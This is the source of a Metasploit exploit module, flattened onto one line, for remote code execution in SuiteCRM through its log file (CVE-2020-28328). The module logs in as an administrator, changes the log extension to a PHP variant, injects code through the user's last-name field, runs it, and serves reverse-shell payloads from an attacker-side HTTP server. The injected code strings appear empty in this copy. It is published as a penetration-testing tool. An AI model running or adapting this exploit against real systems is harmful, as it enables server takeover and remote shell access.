## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'SuiteCRM Log File Remote Code Execution', 'Description' => %q{ This module exploits an input validation error on the log file extension parameter. It does not properly validate upper/lower case characters. Once this occurs, the application log file will be treated as a php file. The log file can then be populated with php code by changing the username of a valid user, as this info is logged. The php code in the file can then be executed by sending an HTTP request to the log file. A similar issue was reported by the same researcher where a blank file extension could be supplied and the extension could be provided in the file name. This exploit will work on those versions as well, and those references are included. }, 'License' => MSF_LICENSE, 'Author' => [ 'M. Cory Billington' # @_th3y ], 'References' => [ ['CVE', '2020-28328'], # First CVE ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue. ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit ], 'Platform' => %w[linux unix], 'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86], 'Targets' => [ [ 'Linux (x64)', { 'Arch' => ARCH_X64, 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' } } ], [ 'Linux (cmd)', { 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ] ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], 'Reliability' => [REPEATABLE_SESSION] }, 'Privileged' => true, 'DisclosureDate' => '2021-04-28', 'DefaultTarget' => 0 ) ) register_options( [ OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']), OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']), OptString.new('PASS', [true, 'Password for administrator', 'admin']), OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]), OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']), OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin']) ] ) end def check authenticate unless @authenticated return Exploit::CheckCode::Unknown unless @authenticated version_check_request = send_request_cgi( { 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => true, 'vars_get' => { 'module' => 'Home', 'action' => 'About' } } ) return Exploit::CheckCode::Unknown("#{peer} - Connection timed out") unless version_check_request version_match = version_check_request.body[/ Version \s \d{1} # Major revision \. \d{1,2} # Minor revision \. \d{1,2} # Bug fix release /x] version = version_match.partition(' ').last if version.nil? || version.empty? about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About" return Exploit::CheckCode::Unknown("Check #{about_url} to confirm version.") end patched_version = Rex::Version.new('7.11.18') current_version = Rex::Version.new(version) return Exploit::CheckCode::Appears("SuiteCRM #{version}") if current_version <= patched_version Exploit::CheckCode::Safe("SuiteCRM #{version}") end def authenticate print_status("Authenticating as #{datastore['USER']}") initial_req = send_request_cgi( { 'method' => 'GET', 'uri' => normalize_uri(target_uri, 'index.php'), 'keep_cookies' => true, 'vars_get' => { 'module' => 'Users', 'action' => 'Login' } } ) return false unless initial_req && initial_req.code == 200 login = send_request_cgi( { 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'index.php'), 'keep_cookies' => true, 'vars_post' => { 'module' => 'Users', 'action' => 'Authenticate', 'return_module' => 'Users', 'return_action' => 'Login', 'user_name' => datastore['USER'], 'username_password' => datastore['PASS'], 'Login' => 'Log In' } } ) return false unless login && login.code == 302 res = send_request_cgi( { 'method' => 'GET', 'uri' => normalize_uri(target_uri, 'index.php'), 'keep_cookies' => true, 'vars_get' => { 'module' => 'Administration', 'action' => 'index' } } ) auth_succeeded?(res) end def auth_succeeded?(res) return false unless res if res.code == 200 print_good("Authenticated as: #{datastore['USER']}") if res.body.include?('Unauthorized access to administration.') print_warning("#{datastore['USER']} does not have administrative rights! Exploit will fail.") @is_admin = false else print_good("#{datastore['USER']} has administrative rights.") @is_admin = true end @authenticated = true return true else print_error("Failed to authenticate as: #{datastore['USER']}") return false end end def post_log_file(data) send_request_cgi( { 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'index.php'), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'keep_cookies' => true, 'headers' => { 'Referer' => "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView" }, 'data' => data.to_s } ) end def modify_system_settings_file filename = rand_text_alphanumeric(8).to_s extension = '.pHp' @php_fname = filename + extension action = 'Modify system settings file' print_status("Trying - #{action}") data = Rex::MIME::Message.new data.add_part('SaveConfig', nil, nil, 'form-data; name="action"') data.add_part('Configurator', nil, nil, 'form-data; name="module"') data.add_part(filename.to_s, nil, nil, 'form-data; name="logger_file_name"') data.add_part(extension.to_s, nil, nil, 'form-data; name="logger_file_ext"') data.add_part('info', nil, nil, 'form-data; name="logger_level"') data.add_part('Save', nil, nil, 'form-data; name="save"') res = post_log_file(data) check_logfile_request(res, action) end def poison_log_file action = 'Poison log file' if target.arch.first == 'cmd' command_injection = "" else @meterpreter_fname = "#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}" command_injection = %( ) end print_status("Trying - #{action}") data = Rex::MIME::Message.new data.add_part('Users', nil, nil, 'form-data; name="module"') data.add_part('1', nil, nil, 'form-data; name="record"') data.add_part('Save', nil, nil, 'form-data; name="action"') data.add_part('EditView', nil, nil, 'form-data; name="page"') data.add_part('DetailView', nil, nil, 'form-data; name="return_action"') data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"') data.add_part(command_injection, nil, nil, 'form-data; name="last_name"') res = post_log_file(data) check_logfile_request(res, action) end def restore action = 'Restore logging to default configuration' print_status("Trying - #{action}") data = Rex::MIME::Message.new data.add_part('SaveConfig', nil, nil, 'form-data; name="action"') data.add_part('Configurator', nil, nil, 'form-data; name="module"') data.add_part('suitecrm', nil, nil, 'form-data; name="logger_file_name"') data.add_part('.log', nil, nil, 'form-data; name="logger_file_ext"') data.add_part('fatal', nil, nil, 'form-data; name="logger_level"') data.add_part('Save', nil, nil, 'form-data; name="save"') post_log_file(data) data = Rex::MIME::Message.new data.add_part('Users', nil, nil, 'form-data; name="module"') data.add_part('1', nil, nil, 'form-data; name="record"') data.add_part('Save', nil, nil, 'form-data; name="action"') data.add_part('EditView', nil, nil, 'form-data; name="page"') data.add_part('DetailView', nil, nil, 'form-data; name="return_action"') data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"') data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name="last_name"') res = post_log_file(data) print_error("Failed - #{action}") unless res && res.code == 301 print_good("Succeeded - #{action}") end def check_logfile_request(res, action) fail_with(Failure::Unknown, "#{action} - no reply") unless res unless res.code == 301 print_error("Failed - #{action}") fail_with(Failure::UnexpectedReply, "Failed - #{action}") end print_good("Succeeded - #{action}") end def execute_php print_status("Executing php code in log file: #{@php_fname}") res = send_request_cgi( { 'uri' => normalize_uri(target_uri, @php_fname), 'keep_cookies' => true } ) fail_with(Failure::NotFound, "#{peer} - Not found: #{@php_fname}") if res && res.code == 404 register_files_for_cleanup(@php_fname) register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty? end def on_request_uri(cli, _request) send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' }) print_good("#{peer} - Payload sent!") end def start_http_server start_service( { 'Uri' => { 'Proc' => proc do |cli, req| on_request_uri(cli, req) end, 'Path' => resource_uri } } ) @download_url = get_uri end def exploit start_http_server authenticate unless @authenticated fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated fail_with(Failure::NoAccess, "#{datastore['USER']} does not have administrative rights!") unless @is_admin modify_system_settings_file poison_log_file execute_php ensure restore if datastore['RESTORECONF'] end end